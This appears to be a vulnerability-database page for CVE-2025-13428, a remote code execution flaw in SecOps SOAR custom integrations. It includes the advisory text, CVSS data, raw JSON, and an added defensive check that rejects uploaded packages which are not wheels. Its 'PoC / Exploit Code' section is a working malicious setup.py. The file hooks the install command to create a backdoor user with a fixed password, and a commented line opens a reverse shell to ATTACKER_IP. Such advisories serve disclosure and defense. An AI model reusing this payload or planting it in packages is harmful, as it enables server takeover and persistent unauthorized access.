Security Vulnerability Report
CVE-2025-13428 CVSS 7.2 HIGH

Published: 2025-12-09 16:17:35
Last Modified: 2026-02-03 19:24:32
Source: f45cbf4e-4146-4068-b7e1-655ffc2c548c

Description

A vulnerability exists in the SecOps SOAR server. The custom integrations feature allowed an authenticated user with an "IDE role" to achieve Remote Code Execution (RCE) in the server. The flaw stemmed from weak validation of uploaded Python package code. An attacker could upload a package containing a malicious setup.py file, which would execute on the server during the installation process, leading to potential server compromise. No customer action is required. All customers have been automatically upgraded to the fixed version: 6.3.64 or higher.
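The flaw above is an install-time code-execution path: an sdist's setup.py runs with the server's privileges when the package is built, whereas a wheel is unpacked without executing any code from the archive. Below is an added admission check for uploaded integration packages (example code, not from the advisory or from Google's SOAR code base) that accepts only wheels and rejects sdists, reporting which install-hook indicators its setup.py contains; SUSPICIOUS_NAMES, the archive names and the two sample builders are constructed for this example.

```python
import ast, io, tarfile, zipfile

# Names whose use in setup.py signals install-time command overrides or
# process spawning; the PoC on this page relies on all three (constructed list).
SUSPICIOUS_NAMES = {"subprocess", "os", "cmdclass"}

def setup_py_indicators(source: str) -> set:
    """Return the SUSPICIOUS_NAMES a setup.py imports or passes to setup()."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            found |= {a.name.split(".")[0] for a in node.names}
        elif isinstance(node, ast.ImportFrom) and node.module:
            found.add(node.module.split(".")[0])
        elif isinstance(node, ast.keyword) and node.arg:
            found.add(node.arg)
    return found & SUSPICIOUS_NAMES

def check_upload(filename: str, data: bytes) -> tuple:
    """(accepted, reason) for an uploaded package: only wheels are installable."""
    if filename.endswith(".whl"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            ok = any(n.endswith(".dist-info/WHEEL") for n in zf.namelist())
        return ok, "wheel: no install-time code runs" if ok else "wheel: malformed"
    if filename.endswith((".tar.gz", ".tgz")):
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
            for m in tf.getmembers():
                if m.isfile() and m.name.split("/")[-1] == "setup.py":
                    hits = setup_py_indicators(tf.extractfile(m).read().decode())
                    return False, f"sdist rejected: setup.py present, hooks={sorted(hits)}"
        return False, "sdist rejected: build step would execute archive code"
    return False, "rejected: unsupported upload type"

def make_sdist(setup_py: str) -> bytes:
    """Constructed sample: a minimal .tar.gz sdist carrying one setup.py."""
    buf, body = io.BytesIO(), setup_py.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        info = tarfile.TarInfo("pkg-1.0/setup.py")
        info.size = len(body)
        tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()

def make_wheel() -> bytes:
    """Constructed sample: a minimal wheel with one module and WHEEL metadata."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pkg/__init__.py", "VERSION = '1.0'\n")
        zf.writestr("pkg-1.0.dist-info/WHEEL", "Wheel-Version: 1.0\n")
    return buf.getvalue()
```

The AST scan is only a report for the audit log; the decision that closes the hole is refusing to run a build step on uploaded code at all.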

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:security_operations_soar:*:*:*:*:*:*:*:* - VULNERABLE
SecOps SOAR Server < 6.3.64

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Malicious setup.py for CVE-2025-13428 PoC
# This demonstrates the RCE vulnerability in SecOps SOAR custom integrations
from setuptools import setup
import subprocess
import os

# Attacker's payload - reverse shell or arbitrary command execution
def exploit():
    # Example: Create a backdoor user
    try:
        # Execute system command during package installation
        subprocess.Popen(['useradd', '-p', '$(openssl passwd -1 evil123)', 'hacker'],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # Or execute reverse shell
        # subprocess.Popen(['bash', '-i', '&>/dev/tcp/ATTACKER_IP/PORT', '0>&1'])
        # Write proof of compromise
        with open('/tmp/pwned_cve_2025_13428.txt', 'w') as f:
            f.write('System compromised via CVE-2025-13428\n')
            f.write(f'Attacker: {os.environ.get("USER", "unknown")}\n')
    except Exception as e:
        pass

setup(
    name='malicious-integration',
    version='1.0.0',
    author='Attacker',
    description='Malicious SecOps SOAR integration package',
    py_modules=[],
    # Execute payload during installation
    cmdclass={
        'install': type('EvilInstall', (), {
            'run': lambda self: exploit()
        })
    }
)

References

https://cloud.google.com/support/bulletins#gcp-2025-075 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13428", "sourceIdentifier": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "published": "2025-12-09T16:17:35.307", "lastModified": "2026-02-03T19:24:32.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the SecOps SOAR server. The custom integrations feature allowed an authenticated user with an \"IDE role\" to achieve Remote Code Execution (RCE) in the server. The flaw stemmed from weak validation of uploaded Python package code. An attacker could upload a package containing a malicious setup.py file, which would execute on the server during the installation process, leading to potential server compromise.\n\nNo customer action is required. \n\n\nAll customers have been automatically upgraded to the fixed version: 6.3.64 or higher."}], "metrics": {"cvssMetricV40": [{"source": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "CLEAR"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:security_operations_soar:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.3.64", "matchCriteriaId": "7B3CA808-0AE5-45E0-9F1D-BC19E8DD7A89"}]}]}], "references": [{"url": "https://cloud.google.com/support/bulletins#gcp-2025-075", "source": "f45cbf4e-4146-4068-b7e1-655ffc2c548c", "tags": ["Vendor Advisory"]}]}}